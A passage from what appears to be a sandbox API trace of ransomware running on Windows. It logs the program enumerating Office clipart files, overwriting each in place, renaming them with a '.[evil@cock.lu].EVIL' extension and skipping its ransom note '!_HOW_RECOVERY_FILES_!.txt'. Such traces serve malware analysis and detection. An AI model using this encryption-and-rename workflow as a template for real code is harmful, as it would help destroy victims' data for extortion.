lpOverlapped=0x0) returned 1 [0106.853] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.853] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.853] _errno () returned 0x84b1160840 [0106.854] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.854] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x33e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x33e0, lpOverlapped=0x0) returned 1 [0106.854] CloseHandle (hObject=0x1a8) returned 1 [0106.854] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.854] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.854] __uncaught_exception () returned 0x84b1160800 [0106.854] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.854] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif.[evil@cock.lu].evil")) returned 1 [0106.855] ??_V@YAXPEAX@Z () returned 0x1 [0106.858] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF", dwFileAttributes=0x200) returned 0 [0106.858] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.858] wcsstr (_Str="AG00165_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.858] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 69 [0106.858] wcscmp (_String1="AG00165_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.858] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00165_.GIF") returned 0x0 [0106.858] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 0x45 [0106.858] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.860] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2186, lpOverlapped=0x0) returned 1 [0106.866] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.866] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.866] _errno () returned 0x84b1160840 [0106.866] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.867] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x21a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x21a0, lpOverlapped=0x0) returned 1 [0106.867] CloseHandle (hObject=0x1a8) returned 1 [0106.867] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.867] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.867] __uncaught_exception () returned 0x84b1160800 [0106.867] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.867] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif.[evil@cock.lu].evil")) returned 1 [0106.868] ??_V@YAXPEAX@Z () returned 0x1 [0106.870] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF", dwFileAttributes=0x200) returned 0 [0106.871] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.871] wcsstr (_Str="AG00167_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.871] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 69 [0106.871] wcscmp (_String1="AG00167_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.871] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00167_.GIF") returned 0x0 [0106.871] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 0x45 [0106.871] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.872] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x131e, lpOverlapped=0x0) returned 1 [0106.881] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.881] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.881] _errno () returned 0x84b1160840 [0106.881] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.881] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1320, lpOverlapped=0x0) returned 1 [0106.881] CloseHandle (hObject=0x1a8) returned 1 [0106.882] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.882] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.882] __uncaught_exception () returned 0x84b1160800 [0106.882] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.882] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif.[evil@cock.lu].evil")) returned 1 [0106.883] ??_V@YAXPEAX@Z () returned 0x1 [0106.885] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF", dwFileAttributes=0x200) returned 0 [0106.885] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.885] wcsstr (_Str="AG00169_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.885] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 69 [0106.885] wcscmp (_String1="AG00169_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.885] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00169_.GIF") returned 0x0 [0106.885] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 0x45 [0106.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.887] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14ff, lpOverlapped=0x0) returned 1 [0106.894] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.894] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.894] _errno () returned 0x84b1160840 [0106.894] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.894] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1500, lpOverlapped=0x0) returned 1 [0106.894] CloseHandle (hObject=0x1a8) returned 1 [0106.894] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.895] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.895] __uncaught_exception () returned 0x84b1160800 [0106.895] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.895] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif.[evil@cock.lu].evil")) returned 1 [0106.895] ??_V@YAXPEAX@Z () returned 0x1 [0106.899] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF", dwFileAttributes=0x200) returned 0 [0106.899] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.899] wcsstr (_Str="AG00170_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.899] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 69 [0106.899] wcscmp (_String1="AG00170_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.899] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00170_.GIF") returned 0x0 [0106.899] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 0x45 [0106.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.901] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2420, lpOverlapped=0x0) returned 1 [0106.910] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.910] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.910] _errno () returned 0x84b1160840 [0106.910] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.911] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2440, lpOverlapped=0x0) returned 1 [0106.911] CloseHandle (hObject=0x1a8) returned 1 [0106.911] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.911] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.911] __uncaught_exception () returned 0x84b1160800 [0106.911] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.911] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif.[evil@cock.lu].evil")) returned 1 [0106.912] ??_V@YAXPEAX@Z () returned 0x1 [0106.915] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF", dwFileAttributes=0x200) returned 0 [0106.915] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.915] wcsstr (_Str="AG00171_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.915] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 69 [0106.915] wcscmp (_String1="AG00171_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.915] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00171_.GIF") returned 0x0 [0106.915] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 0x45 [0106.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.916] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1398, lpOverlapped=0x0) returned 1 [0106.924] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.924] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.924] _errno () returned 0x84b1160840 [0106.924] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.924] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13a0, lpOverlapped=0x0) returned 1 [0106.924] CloseHandle (hObject=0x1a8) returned 1 [0106.924] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.924] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.924] __uncaught_exception () returned 0x84b1160800 [0106.924] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.924] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif.[evil@cock.lu].evil")) returned 1 [0106.925] ??_V@YAXPEAX@Z () returned 0x1 [0106.928] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF", dwFileAttributes=0x200) returned 0 [0106.928] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.928] wcsstr (_Str="AG00172_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.928] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 69 [0106.928] wcscmp (_String1="AG00172_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.928] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00172_.GIF") returned 0x0 [0106.928] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 0x45 [0106.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.930] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1126, lpOverlapped=0x0) returned 1 [0106.937] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.937] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.937] _errno () returned 0x84b1160840 [0106.937] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.937] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1140, lpOverlapped=0x0) returned 1 [0106.937] CloseHandle (hObject=0x1a8) returned 1 [0106.937] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.937] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.937] __uncaught_exception () returned 0x84b1160800 [0106.937] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.938] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif.[evil@cock.lu].evil")) returned 1 [0106.938] ??_V@YAXPEAX@Z () returned 0x1 [0106.941] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF", dwFileAttributes=0x200) returned 0 [0106.941] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.941] wcsstr (_Str="AG00174_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.941] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 69 [0106.941] wcscmp (_String1="AG00174_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.941] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00174_.GIF") returned 0x0 [0106.941] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 0x45 [0106.941] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.943] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf7e, lpOverlapped=0x0) returned 1 [0106.968] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.968] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.968] _errno () returned 0x84b1160840 [0106.968] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.968] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf80, lpOverlapped=0x0) returned 1 [0106.969] CloseHandle (hObject=0x1a8) returned 1 [0106.969] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.969] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.969] __uncaught_exception () returned 0x84b1160800 [0106.969] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.969] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif.[evil@cock.lu].evil")) returned 1 [0106.970] ??_V@YAXPEAX@Z () returned 0x1 [0106.972] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF", dwFileAttributes=0x200) returned 0 [0106.973] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0106.973] wcsstr (_Str="AG00175_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0106.973] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 69 [0106.973] wcscmp (_String1="AG00175_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0106.973] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00175_.GIF") returned 0x0 [0106.973] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 0x45 [0106.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0106.974] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd32, lpOverlapped=0x0) returned 1 [0106.992] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.992] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0106.992] _errno () returned 0x84b1160840 [0106.992] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.992] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xd40, 